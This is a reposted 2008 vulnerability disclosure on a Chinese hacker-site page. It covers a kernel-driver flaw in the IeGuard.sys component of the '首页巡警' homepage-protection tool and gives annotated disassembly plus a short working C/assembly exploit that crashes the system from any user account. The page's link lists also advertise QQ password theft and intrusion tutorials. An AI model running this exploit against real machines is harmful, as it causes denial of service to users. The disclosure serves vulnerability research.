设为首页  加入收藏  联系我们 繁體中文  

黑客软件:

  漏洞扫描 | 木马间谍 | 加密解密 | 远程控制 | 破坏攻击 | 杀毒软件 | 防火墙类 | OICQ专区 | 黑客必备 | 常用工具 | 网吧攻击
文章中心:   最新资讯 | 黑客技术 | 电脑基础 | 菜鸟文摘 | 网络安全 | 网络技巧 | QQ技巧 | OQ空间代码 | 免费资源 | 编程世界 | 建站技术
素材源码:   论坛相关 | ASP源码 | CGI 源码 | NET 源码 | PHP 源码 | 酷站素材 | 字体素材 | 图片素材 | 友情发布 | 网页模版 | 建站软件
教程动画:   黑客教程 | 黑客编程 | 网站入侵 | 菜鸟教程 | 入侵教程 | 破解教程 | 电子书籍 | 网页制作 | 高级会员 | 综合教程 | 本站原创


   

  您当前的位置:中华隐士黑客联盟 -> 黑客技术 -> 木马利用 -> 文章内容 [站内搜索]  

 
首页巡警v1.1/1.0 内核驱动 拒绝服务 及 本地提权漏洞
作者:不详  来源:网络  发布时间:2008-5-24 8:54:45  发布人:www.hack86.com
首页巡警v1.1/1.0 内核驱动 拒绝服务 及 本地提权漏洞 
 

作者:MJ0011
来源:MJ0011的内核驱动研究所

首页巡警v1.1/1.0的内核驱动程序存在严重漏洞

安装了首页巡警v1.1(v1.0)的机器,任意权限的用户可导致系统蓝屏(BSOD),造成拒绝服务攻击

结合我之前公布的SystemCrashDumpInformation加载驱动方式,可以在安装了HIPS的机器上造成本地提权漏洞,即任意权限的用户可以加载驱动到内核并执行。

出问题的函数是IeGuard.sys!HkZwSetValueKey

该函数的第三个参数是PUNICODE_STRING ValueName

IeGuard没有对参数做任何检查就使用RtlCompareUnicodeString函数对该值进行判断,只要在RING3对此参数置0,IeGuard将立即导致系统蓝屏

相关汇编代码:

.text:00011430 HkZwSetValueKey proc near                ; DATA XREF: HookKeyRoutine+52 o
.text:00011430                                          ; sub_11B66+45 o
.text:00011430
.text:00011430 StartPageUniName= UNICODE_STRING ptr -14h
.text:00011430 var_C            = dword ptr -0Ch
.text:00011430 Object           = dword ptr -8
.text:00011430 isPass           = byte ptr -1
.text:00011430 Handle           = dword ptr  8
.text:00011430 ValueName        = dword ptr  0Ch
.text:00011430 arg_8            = dword ptr  10h
.text:00011430 arg_C            = dword ptr  14h
.text:00011430 arg_10           = dword ptr  18h
.text:00011430 arg_14           = dword ptr  1Ch
.text:00011430
.text:00011430                  mov      edi, edi
.text:00011432                  push     ebp
.text:00011433                  mov      ebp, esp
.text:00011435                  sub      esp, 14h
.text:00011438                  push     ebx
.text:00011439                  xor      ebx, ebx
.text:0001143B                  mov      [ebp+isPass], bl
.text:0001143E                  call     ds:ExGetPreviousMode
.text:00011444                  cmp      al, 1
.text:00011446                  jnz      loc_114FA
.text:00011446
.text:0001144C                  push     offset str_StartPage ; SourceString
.text:00011451                  lea      eax, [ebp+StartPageUniName]
.text:00011454                  push     eax              ; DestinationString
.text:00011455                  call     ds:RtlInitUnicodeString
.text:0001145B                  push     1                ; CaseInSensitive
.text:0001145D                  push     [ebp+ValueName] ; String2
.text:00011460                  lea      eax, [ebp+StartPageUniName]
.text:00011463                  push     eax              ; String1
.text:00011464                  call     ds:RtlCompareUnicodeString

<—此处未做任何判断就将ValueName传递给RtlCompareUnicodeString 

导致蓝屏

.text:0001146A                  test     eax, eax
.text:0001146C                  jnz      loc_114FA

利用代码(该代码运行后即可导致安装了首页巡警的机器立即蓝屏,可在任意用户权限下执行)

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwSetValueKey");
__asm
{
push 0
push 0
push 0
push 0
push 0
push 0
call p

}

测试程序下载:
http://www.debugman.com/read.php?tid=1330
或:
http://mj0011.ys168.com/ 漏洞演示\IeGuardLeakTest.rar 
 
[] [返回上一页] [打 印] [收 藏]
  [相关文章评论]    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 

  两行代码绕过首页巡..
一色情网站首页广告..
台湾自由电子报被黑..
台湾自由电子报被黑..
谷歌软件包中文版首..
用密码验证来保护动..
微软Windows Live中..
用密码验证来保护动..
改写首页感染文件:..
近日出现篡改IE浏览..


 
免费获得Q币的最新方法
最新免费在线看的电影网站集绵
不用木马,轻松万能偷daoQQ号码
最新QQ空间4.0全屏版效果图!!
新免蟆Q秀,刷红钻的方法
黑客快速入门(强烈推荐)
QQ密码本地破解的原理和方法
18岁少女欲6000元卖处女身 救患血..
免费QQ蓝钻体验(附考试答案)
8款QQ空间免费开场动画
 
快速利用135端口入侵个人电脑 05-27
Google女孩 想说爱你不容易之沙盒.. 05-27
过NOD内存何须如此麻烦 05-27
J2ee web渗透 05-27
两行代码绕过首页巡警v1.1 05-27
一行代码都不写,穿透金山安全岛.. 05-27
进程保护挑战 - 无HOOK无KDOM,微.. 05-27
一个扩展Dir命令的Vbs脚本 05-27
ATAPI(磁盘端口驱动)级文件保护.. 05-27
谷歌开发安全浏览诊断网页 打造更.. 05-27
 
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 访客留言 论坛登录
〖中华隐士黑客联盟〗,Copyright © 2006-2010 WwW.Hack86.Com 闽ICP备:06023304号
站长:小质 QQ:771760,软件发布MAIL:Hack086@21cn.com